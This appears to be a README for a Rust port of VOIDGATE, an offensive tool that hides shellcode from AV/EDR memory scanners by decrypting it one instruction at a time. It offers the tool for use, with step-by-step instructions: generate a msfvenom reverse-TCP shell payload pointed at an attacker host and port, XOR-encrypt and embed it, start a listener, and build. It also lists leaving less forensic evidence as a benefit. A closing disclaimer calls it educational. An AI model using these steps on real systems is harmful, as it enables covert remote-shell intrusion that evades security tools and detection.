This is a Rust rewrite of the original VOIDGATE project, a technique designed to bypass AV/EDR memory scanners by decrypting and executing shellcode one instruction at a time.
This Rust version maintains the core logic and behavior of the original C++ implementation while taking advantage of Rustβs features:
- Safer memory management
- Cleaner and more maintainable code structure
- Less evidence
The technique, limitations, and step-by-step usage are identical to the original project.
For full technical explanation and background, please refer to:
π Original VOIDGATE C++ Repository
-
Generate your payload using
msfvenom:msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.1 LPORT=443 -f raw > shell.asm -
Encrypt the payload using an XOR encryption tool (use your own or adapt the original).
-
Insert the encrypted shellcode into the Rust project source.
-
Ensure the XOR key matches between encryptor and this project. (You can use random key)
-
Start a listener on your attack machine
-
Compile and run.
cargo build --release
voidgate/
βββ src/
β βββ main.rs # Core logic and VEH setup
βββ Cargo.toml # Rust package manifest
βββ README.md
This project is provided for educational and research purposes only. Do not use this tool in environments where you do not have explicit authorization. Misuse of this tool may violate laws and is strictly discouraged.